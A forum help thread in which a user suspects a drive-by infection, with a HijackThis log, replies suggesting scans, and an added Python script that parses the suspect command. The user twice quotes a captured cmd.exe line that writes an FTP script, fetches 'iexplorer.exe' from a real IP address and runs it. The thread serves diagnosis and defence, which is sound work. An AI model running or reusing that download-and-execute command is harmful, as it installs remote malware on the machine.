Need Virus/Flash/Drive-by expert help
RobinOfLoxley
Posts: 27,040
Forum Member
✭✭✭
Yesterday, with my brother going to Munich I wondered if I could get a 200 cheap ciggies. Googled "germany cigarette prices". Advanced search, in the last month.
I clicked on this link I think (from Google search) which I think may have given me the problem.
DON'T CLICK IT!!
How I saved the link...
PossibleDodgyLink_CD4zEvWx.htm.part.htm
or what I clicked from Google search page
ww.tobaccotoday.info/.../retail-cigarette-brand-prices-around-the-world/
Immediately my mouse started smooth'ish scrolling/dancing all over the screen. I couldn't close tab or quit Firefox.
I turned laptop off by holding power button down.
Now...
My security is..
WOT...I could see the site was 'unknown' but not registered as dangerous. Many are like that.
I have Avira as my main AV, SAS running alongside (real time +manual scans)
WinPatrol in background and my W7 Home UAC was on max.
Not one warning.
Ok I thought, just a Flash scare. Laptop rebooted normally and I ran Malwarebytes, SAS and Avira full scans, one at a time.
Took most of yesterday evening.
All are clear, zero detections or suspicious.
My laptop and all its .exes are working. System restore is working. (save only, not tried a restore, it's a week old. I want to be sure I am clean)
But while they were chugging away, I thought I would do a MozBackup of my Firefox bookmarks.
MozBackup asks where you want to save your backup so I browsed to a new location.
The normal Windows Save As dialog came up but text started scrolling along the text box like a tickertape. About 2 chars per second.
I shut it down, by Task Manager.
Ran it again and fine. Continued browsing digispy as I often do of an evening.
Then nothing for a couple of hours and then this echoed into a new text document I had just opened...
ystemroot%\system32\cmd.exe
del eq&echo open 186.84.116.149 3944 >> eq&echo user 23561 24386 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq
Partial echo since it says ystem not system.
Tried googling 186.84.116.149 and 3944. No inspiration.
Today has been fine.
NetWorx shows no unusual traffic via my router.
.
I am at a loss.
Why has all my security failed to pick up a hijacked mouse and those 'echoes'?
I have a system image from a week ago. And another image as well. So no danger of loss of data, but I am really intrigued/worried.
Specifically, what is that code?
Seeing as I have exhausted many security apps, last one I haven't tried is ComboFix. May try that, but not tried it on this laptop. If it buggers it up, I have saved MBRs, bootCDs, W7 Home DVDs and two images.
I don't want to use HijackThis unless I have to.
0
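What the echoed line does, step by step, as an added example that is not part of the original thread: the sketch splits the command on `&`, rebuilds the FTP script that the `echo ... >> eq` steps write, and reports the server it contacts, the file it fetches and whether that file is then run. The function names are hypothetical, and the splitter ignores cmd.exe quoting and escapes.

```python
import re

# The command line exactly as quoted in the post above.
SAMPLE = ("del eq&echo open 186.84.116.149 3944 >> eq&echo user 23561 24386 >> eq "
          "&echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq")

ECHO_RE = re.compile(r"^echo\s+(?P<text>.*?)\s*>>?\s*(?P<file>\S+)$", re.I)
FTP_RE = re.compile(r"^ftp(?:\.exe)?\b(?P<args>.*)$", re.I)


def split_chain(cmdline):
    """Split on '&', the cmd.exe command separator. Quoting and ^-escapes are ignored."""
    return [step.strip() for step in cmdline.split("&") if step.strip()]


def read_ftp_script(lines, finding):
    """Pull the server, login name and fetched files out of rebuilt FTP script lines."""
    for line in lines:
        words = line.split()
        verb = words[0].lower() if words else ""
        if verb == "open" and len(words) >= 2:
            finding["host"] = words[1]
            finding["port"] = int(words[2]) if len(words) > 2 and words[2].isdigit() else 21
        elif verb == "user" and len(words) >= 2:
            finding["user"] = words[1]
        elif verb in ("get", "recv") and len(words) >= 2:
            finding["downloads"].append(words[-1])


def analyse(cmdline):
    """Rebuild an FTP script assembled with echo redirects; report what it fetches and runs."""
    scripts = {}  # script file name -> lines echoed into it so far
    finding = {"script": None, "host": None, "port": None, "user": None,
               "downloads": [], "executed": [], "suspicious": False}
    for step in split_chain(cmdline):
        echo = ECHO_RE.match(step)
        ftp = FTP_RE.match(step)
        if echo:
            scripts.setdefault(echo["file"].lower(), []).append(echo["text"])
        elif ftp:
            # -s:<file> makes ftp.exe read its commands from that file.
            script = re.search(r"-s:(\S+)", ftp["args"], re.I)
            if script and script[1].lower() in scripts:
                finding["script"] = script[1]
                read_ftp_script(scripts[script[1].lower()], finding)
        elif step.split()[0].lower() in [d.lower() for d in finding["downloads"]]:
            # A later step that names a fetched file runs that file.
            finding["executed"].append(step.split()[0])
    # Fetch-then-run in a single command line is the pattern worth alerting on.
    finding["suspicious"] = bool(finding["downloads"] and finding["executed"])
    return finding


if __name__ == "__main__":
    for key, value in analyse(SAMPLE).items():
        print(f"{key:10} {value}")
```

The fetched file is named iexplorer.exe, which differs from iexplore.exe, the Internet Explorer executable. The `-n` switch stops ftp.exe from attempting an automatic login, so the `user` line in the script supplies the credentials instead.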
Comments
Why don't you want to run HijackThis? It's a simple logging program which will show you what's running on your system and it might reveal exactly what's going on. No changes are made unless you click the 'Fix' button.
Personally though, I would just restore from the image and not bother with any other scans.
Worth a run of this although you do seem to have covered most options.
Picked out 150 threats in the first minute of scan (1%) on my system.
I am only looking for one possible threat that has evaded MBM, SAS, Avira and WinPatrol.
Read through the Stopzilla reviews at
http://download.cnet.com/Stopzilla/3000-8022_4-10104765.html?tag=mncol;1
Ignore the good ones. I agree with "DECEPTIVE"
=====================================
ystemroot%\system32\cmd.exe
del eq&echo open 186.84.116.149 3944 >> eq&echo user 23561 24386 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq
Like Max, the link didn't have any bad effects on my pc also using Avira.
A hijackthis log wouldn't be a bad idea.
Sorry, no idea about the code.
No idea how to interpret it. I leave it here for safekeeping.
Point me to a Hijack moderator site, unless you spot anything yourself.
(non Hijack peeps..pls browse past this post, it's just a cut and paste.)
===================
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 19:53:59, on 10/12/2010
Platform: Windows 7 (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16671)
Boot mode: Normal
Running processes:
C:\Program Files (x86)\Common Files\Seagate\Schedule2\schedhlp.exe
C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe
C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
G:\Program Files (x86)\Uniblue\ProcessQuickLink 2\ProcessQuickLink2.exe
C:\Program Files (x86)\Hp\QuickPlay\QPService.exe
C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files (x86)\BillP Studios\WinPatrol\WinPatrol.exe
C:\Program Files (x86)\Freecorder\FLVSrvc.exe
C:\Users\Bradham\AppData\Roaming\Dropbox\bin\Dropbox.exe
G:\Program Files (x86)\Seagate\DiscWizard\DiscWizardMonitor.exe
G:\Program Files (x86)\Seagate\DiscWizard\TimounterMonitor.exe
C:\Program Files (x86)\TightVNC\tvnserver.exe
C:\Program Files (x86)\RealVNC\VNC4\winvnc4.exe
G:\Program Files (x86)\NetWorx\networx.exe
C:\Program Files (x86)\Hewlett-Packard\Shared\hpqToaster.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Users\Bradham\Desktop\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_GB&c=94&bd=Presario&pf=cnnb
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_GB&c=94&bd=Presario&pf=cnnb
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_GB&c=94&bd=Presario&pf=cnnb
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_GB&c=94&bd=Presario&pf=cnnb
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Freecorder Toolbar - {1392b8d2-5c05-419f-a8f6-b9f15a596612} - C:\Program Files (x86)\Freecorder\tbFree.dll
F2 - REG:system.ini: UserInit=c:\windows\syswow64\userinit.exe,
O1 - Hosts: ::1 localhost
O2 - BHO: Shareaza Web Download Hook - {0EEDB912-C5FA-486F-8334-57288578C627} - g:\Program Files (x86)\Shareaza\RazaWebHook32.dll
O2 - BHO: Freecorder Toolbar - {1392b8d2-5c05-419f-a8f6-b9f15a596612} - C:\Program Files (x86)\Freecorder\tbFree.dll
O2 - BHO: Search Helper - {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll
O2 - BHO: AOL Toolbar BHO - {7C554162-8CB7-45A4-B8F4-8EA1C75885F9} - C:\Program Files (x86)\AOL\AOL Toolbar 5.0\aoltb.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files (x86)\Google\GoogleToolbarNotifier\5.6.5612.1312\swg.dll
O2 - BHO: WOT Helper - {C920E44A-7F78-4E64-BDD7-A57026E7FEB7} - C:\Program Files (x86)\WOT\WOT.dll
O2 - BHO: Bing Bar BHO - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2322.0\npwinext.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - G:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
O3 - Toolbar: AOL Toolbar - {DE9C389F-3316-41A7-809B-AA305ED9D922} - C:\Program Files (x86)\AOL\AOL Toolbar 5.0\aoltb.dll
O3 - Toolbar: Freecorder Toolbar - {1392b8d2-5c05-419f-a8f6-b9f15a596612} - C:\Program Files (x86)\Freecorder\tbFree.dll
O3 - Toolbar: WOT - {71576546-354D-41c9-AAE8-31F2EC22BF0D} - C:\Program Files (x86)\WOT\WOT.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
O3 - Toolbar: @C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2322.0\npwinext.dll,-100 - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2322.0\npwinext.dll
O4 - HKLM\..\Run: [QPService] "C:\Program Files (x86)\HP\QuickPlay\QPService.exe"
O4 - HKLM\..\Run: [UCam_Menu] "C:\Program Files (x86)\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" "C:\Program Files (x86)\CyberLink\YouCam" UpdateWithCreateOnce "Software\CyberLink\YouCam\2.0"
O4 - HKLM\..\Run: [QlbCtrl.exe] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [UpdatePRCShortCut] "C:\Program Files (x86)\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe" "C:\Program Files (x86)\Hewlett-Packard\Recovery" UpdateWithCreateOnce "Software\CyberLink\PowerRecover"
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [WirelessAssistant] C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
O4 - HKLM\..\Run: [avgnt] "C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKLM\..\Run: [WinPatrol] C:\Program Files (x86)\BillP Studios\WinPatrol\winpatrol.exe -expressboot
O4 - HKLM\..\Run: [Freecorder FLV Service] "C:\Program Files (x86)\Freecorder\FLVSrvc.exe" /run
O4 - HKLM\..\Run: [DiscWizardMonitor.exe] G:\Program Files (x86)\Seagate\DiscWizard\DiscWizardMonitor.exe
O4 - HKLM\..\Run: [AcronisTimounterMonitor] G:\Program Files (x86)\Seagate\DiscWizard\TimounterMonitor.exe
O4 - HKLM\..\Run: [tvncontrol] "C:\Program Files (x86)\TightVNC\tvnserver.exe" -controlservice -slave
O4 - HKLM\..\Run: [NetWorx] "g:\Program Files (x86)\NetWorx\networx.exe" /auto
O4 - HKCU\..\Run: [LightScribe Control Panel] C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe -hidden
O4 - HKCU\..\Run: [swg] "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
O4 - HKCU\..\Run: [Google Update] "C:\Users\Bradham\AppData\Local\Google\Update\GoogleUpdate.exe" /c
O4 - HKCU\..\Run: [Uniblue ProcessQuickLink 2] "g:\Program Files (x86)\Uniblue\ProcessQuickLink 2\ProcessQuickLink2.exe" /autostart
O4 - HKCU\..\Run: [SUPERAntiSpyware] G:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
O4 - Startup: Canon IJ Status Monitor Canon MP250 series Printer on TOWER2002.lnk = ?
O4 - Startup: Dropbox.lnk = Bradham\AppData\Roaming\Dropbox\bin\Dropbox.exe
O4 - Startup: Run VNC Server.lnk = C:\Program Files (x86)\RealVNC\VNC4\winvnc4.exe
O4 - Startup: SpeedFan.lnk = C:\Program Files (x86)\SpeedFan\speedfan.exe
O4 - Startup: taskmgr.exe.lnk = C:\Windows\System32\taskmgr.exe
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O8 - Extra context menu item: &AOL Toolbar Search - C:\ProgramData\AOL\ieToolbar\resources\en-GB\local\search.html
O8 - Extra context menu item: Download with &Shareaza - res://g:\Program Files (x86)\Shareaza\RazaWebHook32.dll/3000
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~2\MICROS~4\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Google Sidewiki... - res://C:\Program Files (x86)\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_89D8574934B26AC4.dll/cmsidewiki.html
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O18 - Protocol: wot - {C2A44D6B-CB9F-4663-88A6-DF2F26E4D952} - C:\Program Files (x86)\WOT\WOT.dll
O23 - Service: SAS Core Service (!SASCORE) - SUPERAntiSpyware.com - G:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
O23 - Service: Andrea ST Filters Service (AESTFilters) - Andrea Electronics Corporation - C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_ccf0dd3cb081af84\AESTSr64.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: Avira AntiVir Scheduler (AntiVirSchedulerService) - Avira GmbH - C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH - C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
O23 - Service: Com4QLBEx - Hewlett-Packard Development Company, L.P. - C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: GameConsoleService - WildTangent, Inc. - C:\Program Files (x86)\HP Games\HP Game Console\GameConsoleService.exe
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: HP Health Check Service - Hewlett-Packard Company - C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe
O23 - Service: hpqwmiex - Hewlett-Packard Company - C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
O23 - Service: LogMeIn Maintenance Service (LMIMaint) - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe
O23 - Service: LogMeIn - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Seagate Scheduler2 Service (SgtSch2Svc) - Seagate - C:\Program Files (x86)\Common Files\Seagate\Schedule2\schedul2.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Audio Service (STacSV) - IDT, Inc. - C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_ccf0dd3cb081af84\STacSV64.exe
O23 - Service: TightVNC Server (tvnserver) - GlavSoft LLC. - C:\Program Files (x86)\TightVNC\tvnserver.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files (x86)\RealVNC\VNC4\WinVNC4.exe
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 13700 bytes
Mouse moving about side to side all over the shop can be quite common and don't think it's anything to worry about TBO.
Have backed up emails and bookmarks. Haven't done anything else in that time.